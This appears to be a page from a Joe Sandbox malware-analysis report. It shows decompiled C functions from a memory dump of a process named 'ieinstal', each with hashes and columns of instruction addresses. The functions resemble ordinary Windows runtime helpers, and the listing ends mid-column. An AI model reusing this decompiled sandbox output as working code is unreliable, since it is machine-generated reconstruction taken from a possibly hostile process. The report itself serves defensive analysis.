                                                            0x1ec8a69d
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ce268f54d4739670dff4b948196e16c769645cfdb43da77a58ec88bd8fb3868
                                                            • Instruction ID: 63a09b60cd096f036d4401a3efddb8136d298b876c2ba72efb96afe1a3198b23
                                                            • Opcode Fuzzy Hash: 0ce268f54d4739670dff4b948196e16c769645cfdb43da77a58ec88bd8fb3868
                                                            • Instruction Fuzzy Hash: 2941ABB6A00215DFCB14CF59C990B9DBBF2FF48704F1982A9E908AB348D774A941CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC93D43 Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC93D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E1EC67B60(0, _t61, 0x1ec311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E1EC67B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L1EC74620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                            0x1ec93d4c
                                                            0x1ec93d50
                                                            0x1ec93d55
                                                            0x1ec93d5e
                                                            0x1ecce79a
                                                            0x00000000
                                                            0x1ecce79a
                                                            0x1ec93d68
                                                            0x1ecce789
                                                            0x1ec93d9d
                                                            0x1ec93da3
                                                            0x1ec93daf
                                                            0x1ec93db5
                                                            0x1ec93dbc
                                                            0x1ec93dc4
                                                            0x1ec93dc9
                                                            0x1ec93dce
                                                            0x1ecce7ae
                                                            0x1ecce7ae
                                                            0x1ec93dde
                                                            0x1ec93de2
                                                            0x1ec93de7
                                                            0x1ec93e0d
                                                            0x1ec93e13
                                                            0x1ec93e16
                                                            0x1ec93e1e
                                                            0x1ec93e25
                                                            0x1ec93e28
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec93e2a
                                                            0x1ec93e2f
                                                            0x1ec93e37
                                                            0x1ec93e37
                                                            0x00000000
                                                            0x1ec93e37
                                                            0x1ec93e31
                                                            0x00000000
                                                            0x1ec93e31
                                                            0x1ec93e20
                                                            0x1ec93e20
                                                            0x1ec93e35
                                                            0x00000000
                                                            0x1ec93de9
                                                            0x1ec93de9
                                                            0x1ec93de9
                                                            0x1ec93dee
                                                            0x1ec93dfd
                                                            0x1ec93dff
                                                            0x1ec93e02
                                                            0x1ec93e05
                                                            0x1ec93e05
                                                            0x00000000
                                                            0x1ec93df0
                                                            0x1ec93de7
                                                            0x1ecce78f
                                                            0x1ecce794
                                                            0x1ec93d79
                                                            0x1ec93d84
                                                            0x1ec93d89
                                                            0x1ec93d8e
                                                            0x00000000
                                                            0x1ecce7a4
                                                            0x1ec93d96
                                                            0x1ec93d9a
                                                            0x00000000
                                                            0x1ec93d9a
                                                            0x00000000
                                                            0x1ecce794
                                                            0x1ec93d6e
                                                            0x1ec93d73
                                                            0x00000000
                                                            0x1ecce7b5
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 432e9d4c849067693aebb524409dceff1bff80413564d159c451eb140bc1cd1b
                                                            • Instruction ID: 2ae2dc4c60c01a0769fcc4167d25c8e79cfa57ff802840d146cc9f9818b6916f
                                                            • Opcode Fuzzy Hash: 432e9d4c849067693aebb524409dceff1bff80413564d159c451eb140bc1cd1b
                                                            • Instruction Fuzzy Hash: BB31E232A24651DFC7248F2ECC51AABBBF2EF95700701966AE845CB354E730D880D790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD7016 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E1ECD7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1ed4d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E1ECD6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E1ECD6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E1EC77D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E1EC99AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E1EC9B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L1EC74620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                            0x1ecd7016
                                                            0x1ecd701e
                                                            0x1ecd702b
                                                            0x1ecd7033
                                                            0x1ecd7037
                                                            0x1ecd703c
                                                            0x1ecd703e
                                                            0x1ecd7041
                                                            0x1ecd7045
                                                            0x1ecd704a
                                                            0x1ecd7050
                                                            0x1ecd7055
                                                            0x1ecd705a
                                                            0x1ecd7062
                                                            0x1ecd7062
                                                            0x1ecd705a
                                                            0x1ecd7064
                                                            0x1ecd7064
                                                            0x1ecd7067
                                                            0x1ecd7071
                                                            0x1ecd7096
                                                            0x1ecd709b
                                                            0x1ecd70a2
                                                            0x1ecd70a6
                                                            0x1ecd70a7
                                                            0x1ecd70ad
                                                            0x1ecd70b3
                                                            0x1ecd70b6
                                                            0x1ecd70bb
                                                            0x1ecd70c3
                                                            0x1ecd70c3
                                                            0x1ecd70c6
                                                            0x1ecd70cd
                                                            0x1ecd70dd
                                                            0x1ecd70e0
                                                            0x1ecd70e2
                                                            0x1ecd70e2
                                                            0x1ecd70ee
                                                            0x1ecd7101
                                                            0x1ecd70f0
                                                            0x1ecd70f9
                                                            0x1ecd70f9
                                                            0x1ecd710a
                                                            0x1ecd710e
                                                            0x1ecd7112
                                                            0x1ecd7117
                                                            0x1ecd7118
                                                            0x1ecd7118
                                                            0x1ecd70bb
                                                            0x1ecd711d
                                                            0x1ecd7123
                                                            0x1ecd7131
                                                            0x1ecd7131
                                                            0x1ecd7136
                                                            0x1ecd713d
                                                            0x1ecd713e
                                                            0x1ecd713f
                                                            0x1ecd714a
                                                            0x1ecd714a
                                                            0x1ecd7084
                                                            0x1ecd7088
                                                            0x00000000
                                                            0x1ecd708e
                                                            0x1ecd708e
                                                            0x1ecd7092
                                                            0x00000000
                                                            0x1ecd7092

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18367d797f9d9ee2deca86fc48fbf000af48a30434c3a42223fd76e2781bb5d6
                                                            • Instruction ID: fad38d0ce4e76835e4241359664fb3677f03af59a0956a0e617e979e068c64aa
                                                            • Opcode Fuzzy Hash: 18367d797f9d9ee2deca86fc48fbf000af48a30434c3a42223fd76e2781bb5d6
                                                            • Instruction Fuzzy Hash: FC31C2766047959BC310CF28CC50A6AB3EAFF88700F014B2DF99987694EB31E908C7E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7C182 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E1EC7C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E1EC77D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E1ED28D34(_v8, _t80);
					}
					E1EC72280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E1EC6FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E1ED28833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E1EC6FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E1EC9B180();
						if(_a4 != 0) {
							E1EC72280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E1EC7BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E1EC7BB2D(_t16, _t15);
						E1EC7B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E1EC6FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E1EC6FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E1EC6FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                            0x1ec7c18d
                                                            0x1ec7c18f
                                                            0x1ec7c191
                                                            0x1ec7c19b
                                                            0x1ec7c1a0
                                                            0x1ec7c1d4
                                                            0x1ec7c1de
                                                            0x1ecc2d6e
                                                            0x1ec7c1e4
                                                            0x1ec7c1e4
                                                            0x1ec7c1e4
                                                            0x1ec7c1ec
                                                            0x1ecc2d7d
                                                            0x1ecc2d7d
                                                            0x1ec7c1f3
                                                            0x1ec7c1ff
                                                            0x1ecc2d88
                                                            0x1ecc2d8d
                                                            0x1ecc2d94
                                                            0x1ecc2d94
                                                            0x1ecc2d9f
                                                            0x1ecc2da4
                                                            0x1ecc2dab
                                                            0x1ecc2db0
                                                            0x1ecc2db2
                                                            0x1ecc2db3
                                                            0x1ecc2db4
                                                            0x1ecc2dbc
                                                            0x1ecc2dc3
                                                            0x1ecc2dc3
                                                            0x1ec7c205
                                                            0x1ec7c205
                                                            0x1ec7c208
                                                            0x1ec7c20e
                                                            0x1ec7c211
                                                            0x1ec7c216
                                                            0x1ec7c219
                                                            0x1ec7c21f
                                                            0x1ec7c222
                                                            0x1ec7c22c
                                                            0x1ec7c234
                                                            0x1ec7c23a
                                                            0x1ec7c23f
                                                            0x1ec7c245
                                                            0x1ec7c24b
                                                            0x1ec7c251
                                                            0x1ec7c25a
                                                            0x1ec7c276
                                                            0x1ec7c27d
                                                            0x1ec7c27d
                                                            0x1ec7c25c
                                                            0x1ec7c25c
                                                            0x00000000
                                                            0x1ec7c25e
                                                            0x1ec7c1a4
                                                            0x1ec7c1aa
                                                            0x1ec7c1b3
                                                            0x1ec7c265
                                                            0x1ec7c26c
                                                            0x1ec7c26c
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                            • Instruction ID: 3822431460d2d40582e28c7b7ec2ecbb01462379727f996efc26e35527fdddad
                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                            • Instruction Fuzzy Hash: A7310376A015C7BAD708DBB1CC90BDAF796BF4A204F04876AD41C57205DB346A49CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8A70E Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E1EC8A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1ed47b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1ed47b10 = 8;
					 *0x1ed47b14 = 0x1ed47b0c;
					 *0x1ed47b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E1EC8A990(0x1ed47b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L1EC8A840(__edx, __ecx, __ecx, _t52, 0x1ed47b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1ed47b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x1ed47b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x1ed47b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L1EC74620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1ed47b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E1EC9F3E0(_t50,  *0x1ed47b14, _t8 >> 3);
						_t28 =  *0x1ed47b14; // 0x77f07b0c
						__eflags = _t28 - 0x1ed47b0c;
						if(_t28 != 0x1ed47b0c) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x1ed47b14 = _t50;
						_t48 = _v12;
						 *0x1ed47b10 = _t9;
						goto L6;
					}
					 *0x1ed47b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                            0x1ec8a713
                                                            0x1ec8a714
                                                            0x1ec8a717
                                                            0x1ec8a71d
                                                            0x1ec8a720
                                                            0x1ec8a722
                                                            0x1ec8a727
                                                            0x1ec8a74a
                                                            0x1ec8a754
                                                            0x1ec8a75e
                                                            0x1ec8a768
                                                            0x1ec8a76a
                                                            0x1ec8a773
                                                            0x1ec8a78b
                                                            0x1ec8a790
                                                            0x1ec8a792
                                                            0x1ec8a741
                                                            0x1ec8a741
                                                            0x1ec8a743
                                                            0x1ec8a749
                                                            0x1ec8a749
                                                            0x1ec8a732
                                                            0x1ec8a73a
                                                            0x1ec8a797
                                                            0x1ec8a79d
                                                            0x1ec8a7a3
                                                            0x1ec8a7a9
                                                            0x1ec8a7b6
                                                            0x1ec8a7bc
                                                            0x1ec8a7ca
                                                            0x1ec8a7e0
                                                            0x1ec8a7e2
                                                            0x1ec8a7e4
                                                            0x1ecc9bf2
                                                            0x00000000
                                                            0x1ecc9bf2
                                                            0x1ec8a7ed
                                                            0x1ec8a7f2
                                                            0x1ec8a800
                                                            0x1ec8a805
                                                            0x1ec8a80d
                                                            0x1ec8a812
                                                            0x1ecc9c08
                                                            0x1ecc9c08
                                                            0x1ec8a818
                                                            0x1ec8a81b
                                                            0x1ec8a821
                                                            0x1ec8a824
                                                            0x00000000
                                                            0x1ec8a824
                                                            0x1ec8a7ae
                                                            0x00000000
                                                            0x1ec8a7ae
                                                            0x1ec8a73c
                                                            0x1ec8a73e
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc18870166434dbc5af238d43b2dbec8f4904010113ca80f3afb77492b68500c
                                                            • Instruction ID: f41cef3da056675fa1429b09df7c15e63dba424d3e49735d2985d9e8123e3044
                                                            • Opcode Fuzzy Hash: bc18870166434dbc5af238d43b2dbec8f4904010113ca80f3afb77492b68500c
                                                            • Instruction Fuzzy Hash: 4A31DCB6600660AFC701CF09CDD0F5A7BF9FBA4790F160E5AE14487B40E770A902CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5AA16 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 95%
                                                            			E1EC5AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1ed4d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1ed47b9c; // 0x0
					_t53 = L1EC74620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E1EC9B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E1EC9F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L1EC66C59(_t53, _t51, _t58) != 0) {
							_t28 = E1EC85E50(0x1ec3c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E1EC8B230(_v32, _v28, 0x1ec3c2d8, 1,  &_v24);
								_t28 = E1EC5F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                            0x1ec5aa25
                                                            0x1ec5aa29
                                                            0x1ec5aa2d
                                                            0x1ec5aa30
                                                            0x1ec5aa37
                                                            0x1ec5aa3c
                                                            0x1ecb4458
                                                            0x1ecb4458
                                                            0x1ecb4472
                                                            0x1ecb4474
                                                            0x1ecb4476
                                                            0x1ec5aa64
                                                            0x1ec5aa74
                                                            0x1ecb447c
                                                            0x1ecb4483
                                                            0x1ecb4492
                                                            0x1ec5aa52
                                                            0x1ec5aa54
                                                            0x1ec5aa5e
                                                            0x1ecb44a8
                                                            0x1ecb44ad
                                                            0x1ecb44af
                                                            0x1ecb44b6
                                                            0x1ecb44b6
                                                            0x1ecb44b9
                                                            0x1ecb44bc
                                                            0x1ecb44cd
                                                            0x1ecb44d3
                                                            0x1ecb44d6
                                                            0x1ecb44e1
                                                            0x1ecb44e1
                                                            0x1ecb44e6
                                                            0x1ecb44e8
                                                            0x1ecb44fb
                                                            0x1ecb44fb
                                                            0x1ecb44e8
                                                            0x00000000
                                                            0x1ec5aa5e
                                                            0x1ecb4476
                                                            0x1ec5aa42
                                                            0x1ec5aa46
                                                            0x1ec5aa48
                                                            0x1ec5aa4c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e2e802ea06f57115e95cf1936673b2158deac078271c7053895cfa91c7d1eb1
                                                            • Instruction ID: 0228f672c18a6a4144c16e93684c82c3d1e8806aa7c5f96faccf3249bb589a44
                                                            • Opcode Fuzzy Hash: 1e2e802ea06f57115e95cf1936673b2158deac078271c7053895cfa91c7d1eb1
                                                            • Instruction Fuzzy Hash: 5531E572A00259ABCB059F69CD81ABFB7B9FF04700B014669F901DB254EB34AD21DBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC861A0 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 97%
                                                            			E1EC861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E1EC85E50(0x1ec367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E1ED29D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E1EC5F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                            0x1ec861b3
                                                            0x1ec861b5
                                                            0x1ec861bd
                                                            0x1ec861c3
                                                            0x1ec861c7
                                                            0x1ec861d2
                                                            0x1ec861ff
                                                            0x1ec861ff
                                                            0x1ec86201
                                                            0x1ec86207
                                                            0x1ec86207
                                                            0x1ec861d4
